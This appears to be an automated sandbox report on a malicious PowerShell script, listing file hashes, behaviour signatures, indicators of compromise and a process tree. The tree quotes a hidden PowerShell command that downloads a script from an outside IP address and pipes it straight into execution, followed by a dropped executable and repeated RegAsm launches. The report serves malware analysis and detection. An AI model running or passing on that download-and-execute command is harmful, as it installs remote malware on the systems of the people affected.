Analysis
-
max time kernel
17s -
max time network
19s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-it -
resource tags
arch:x64arch:x86image:win10v2004-20241007-itlocale:it-itos:windows10-2004-x64systemwindows -
submitted
02-01-2025 15:41
Static task
static1
General
-
Target
malicious_script_1.ps1
-
Size
2KB
-
MD5
a19cff86bcb8ba356ca034582a53f870
-
SHA1
d9a1cf4e9125ab420ebb614f67cb81c6efed1afb
-
SHA256
ae7811c08d45da31fecb2a31c6491459765667f12bc187abaf40db75755e4b1a
-
SHA512
4c5e9fb74d890d1b69f1ebc2fc5daae20229f69bee3f4a1e26b8f9465812f39555de5e15dcbda7b1fc3a6c6042dca05d57b4591cd2f545935d8d5e4a75d4e9a6
Malware Config
Signatures
-
Blocklisted process makes network request 2 IoCs
flow pid Process 6 3488 powershell.exe 17 4052 powershell.exe -
pid Process 3488 powershell.exe 4052 powershell.exe -
Downloads MZ/PE file
-
Drops startup file 1 IoCs
description ioc Process File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DeleteApp.url powershell.exe -
Executes dropped EXE 1 IoCs
pid Process 1316 Package.exe -
Loads dropped DLL 1 IoCs
pid Process 1316 Package.exe -
Program crash 1 IoCs
pid pid_target Process procid_target 4064 1316 WerFault.exe 84 -
System Location Discovery: System Language Discovery 1 TTPs 5 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Package.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language csc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe -
Suspicious behavior: EnumeratesProcesses 16 IoCs
pid Process 3488 powershell.exe 3488 powershell.exe 3488 powershell.exe 3488 powershell.exe 4052 powershell.exe 4052 powershell.exe 4052 powershell.exe 4052 powershell.exe 4052 powershell.exe 4052 powershell.exe 4052 powershell.exe 4052 powershell.exe 4052 powershell.exe 4052 powershell.exe 4052 powershell.exe 4052 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 3488 powershell.exe Token: SeDebugPrivilege 4052 powershell.exe -
Suspicious use of SetWindowsHookEx 3 IoCs
pid Process 1316 Package.exe 1316 Package.exe 1316 Package.exe -
Suspicious use of WriteProcessMemory 32 IoCs
description pid Process procid_target PID 3488 wrote to memory of 3896 3488 powershell.exe 83 PID 3488 wrote to memory of 3896 3488 powershell.exe 83 PID 3896 wrote to memory of 1316 3896 cmd.exe 84 PID 3896 wrote to memory of 1316 3896 cmd.exe 84 PID 3896 wrote to memory of 1316 3896 cmd.exe 84 PID 1316 wrote to memory of 2312 1316 Package.exe 85 PID 1316 wrote to memory of 2312 1316 Package.exe 85 PID 1316 wrote to memory of 2312 1316 Package.exe 85 PID 2312 wrote to memory of 4052 2312 cmd.exe 87 PID 2312 wrote to memory of 4052 2312 cmd.exe 87 PID 2312 wrote to memory of 4052 2312 cmd.exe 87 PID 4052 wrote to memory of 3752 4052 powershell.exe 88 PID 4052 wrote to memory of 3752 4052 powershell.exe 88 PID 4052 wrote to memory of 3752 4052 powershell.exe 88 PID 3752 wrote to memory of 980 3752 csc.exe 89 PID 3752 wrote to memory of 980 3752 csc.exe 89 PID 3752 wrote to memory of 980 3752 csc.exe 89 PID 4052 wrote to memory of 2244 4052 powershell.exe 95 PID 4052 wrote to memory of 2244 4052 powershell.exe 95 PID 4052 wrote to memory of 2244 4052 powershell.exe 95 PID 4052 wrote to memory of 4180 4052 powershell.exe 96 PID 4052 wrote to memory of 4180 4052 powershell.exe 96 PID 4052 wrote to memory of 4180 4052 powershell.exe 96 PID 4052 wrote to memory of 232 4052 powershell.exe 97 PID 4052 wrote to memory of 232 4052 powershell.exe 97 PID 4052 wrote to memory of 232 4052 powershell.exe 97 PID 4052 wrote to memory of 1700 4052 powershell.exe 98 PID 4052 wrote to memory of 1700 4052 powershell.exe 98 PID 4052 wrote to memory of 1700 4052 powershell.exe 98 PID 4052 wrote to memory of 3104 4052 powershell.exe 99 PID 4052 wrote to memory of 3104 4052 powershell.exe 99 PID 4052 wrote to memory of 3104 4052 powershell.exe 99
Processes
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\malicious_script_1.ps11⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Drops startup file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3488 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Windows\Temp\Package.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:3896 -
C:\Windows\Temp\Package.exeC:\Windows\Temp\Package.exe3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1316 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -windowstyle hidden -command "iwr -useb http://147.45.44.131/infopage/iubn.ps1 -Headers @{ 'X-Special-Header' = 'qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq' } | iex"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2312 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -windowstyle hidden -command "iwr -useb http://147.45.44.131/infopage/iubn.ps1 -Headers @{ 'X-Special-Header' = 'qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq' } | iex"5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4052 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ao2i5prl\ao2i5prl.cmdline"6⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3752 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC40B.tmp" "c:\Users\Admin\AppData\Local\Temp\ao2i5prl\CSC49CB1438D3084D8BBE769D6B1A4E09F.TMP"7⤵
- System Location Discovery: System Language Discovery
PID:980
-
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"6⤵PID:2244
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"6⤵PID:4180
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"6⤵PID:232
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"6⤵PID:1700
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"6⤵PID:3104
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1316 -s 6884⤵
- Program crash
PID:4064
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 1316 -ip 13161⤵PID:3048
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5eb4d127b8a6f84a1cee423c5e3e3a51d
SHA1c55263a8ff097067f2393ce2120801a445fd1949
SHA256d73b077e2ae7f7608ebf774fb83ab13c7bc7a5c3e4d9d96fda2bf695dc698514
SHA51245a52004f8b63ac089de017437ba0e03335f18469942795d36ce3c3d017f842e582103c91e07d9af0fa8dfbbe6f2f68f2fac91383a48b6535952a8630911f21e
-
Filesize
1KB
MD543ec07121a4b653d40fcc6988f1f48e6
SHA1faea921ed42952c408db3330a2c0314810e0d8ea
SHA25671ea0dcdcdbc900f89b812dcb947b1aa494766012274b5d70ae5e68fe222bc22
SHA512cc6e08914af877ae348de9b87701d84a1d17c9870fdd2c23ed95c639a18d9d7481d6fcb4439451c464c586d0aaef9dc5d8341f85da1d4bfbd3f16723cb75f94b
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
9KB
MD5cd868f624119ed8ab34729ee295ba28a
SHA1e8f31162bdc73b12a9cfc68c6fbe4cca7742805b
SHA256a3caf249209d5ee6efdd915f94e7e4ef5c2a9fc511b9aa55acf6a335b5e8943e
SHA5123c9a6d9b4b2d8bfcb4c3910e6342b526d0d0efed2d0e537f95acfc90411a179e54921236c7df040214f6a0237328077c5aa507897c7f570e9bfb1955bed9cc8e
-
Filesize
88KB
MD533ae2b9c3e710254fe2e2ce35ff8a7c8
SHA1109e32187254b27e04ef18bbe1b48fad42bca841
SHA2569c2838e120c7ed5b582bedc6177f14a52aa578adeea269d0f96fc71a95bd6e68
SHA5122abe017e2f1d29fe789206d6483b9b33e7abd0871300d678eaba15e390d55c5e197d6cea6ea32dfdee5f65d082574adcc192a4fc0c9506bbba8ad7e957e12599
-
Filesize
201KB
MD52696d944ffbef69510b0c826446fd748
SHA1e4106861076981799719876019fe5224eac2655c
SHA256a4f53964cdddcccbd1b46da4d3f7f5f4292b5dd11c833d3db3a1e7def36da69a
SHA512c286bc2da757cbb2a28cf516a4a273dd11b15f674d5f698a713dc794f013b7502a8893ab6041e51bab3cdd506a18c415b9df8483b19e312f8fcb88923f42b8eb
-
Filesize
652B
MD52cce3cfffa5ba0a0a9c27495f80b3936
SHA1f191de1ba1b90166cd5f7fa51297bbba0458114a
SHA2563013be28ae25ea0569ddea990799b1347860ccd106c2fc91f43f0a77a69a8022
SHA512d19ffec0efa854826349f2810013dcf54527f88fbb5c0e1ea8526c8b9dc9af595334892e5eef9311ba3a8a89d111f88716dd4c996e9ea510da9940ae933061bc
-
Filesize
10KB
MD53fa79decff8805745cea8116d9bb2643
SHA192343c5fa2c768b964ae3a4e9136e5d7193e8558
SHA256e6852a401b53a7af04d57aa1e4fc9621e3dffc1221534142316a27ae67e8f89c
SHA5125c2879e59fa6609e6e87f70c5237b250a906bf7dd13a343dac9e81635b1fc91ad9374e643a306b99503c52ce9bd56554a64aa132584c732d43ee39fb17305d78
-
Filesize
204B
MD5ad4d2e6f46b99523862522b8b4d5c9ce
SHA1a82e538ac99558fcc8aaff11c4500338aed44dc4
SHA256ec979de9ba575b0bb5b8ae98a37dceb0b2b47e94ab06ab80fc646c7c78075988
SHA512af184d57f7e4b7d0749b7e205acc015407f53e05b86f0a7d4eef7b363c5dcf23e1bc54a14f78e2fe972d3ef49e03cc176cc4d78a7c61bece87241d7d879fcd4e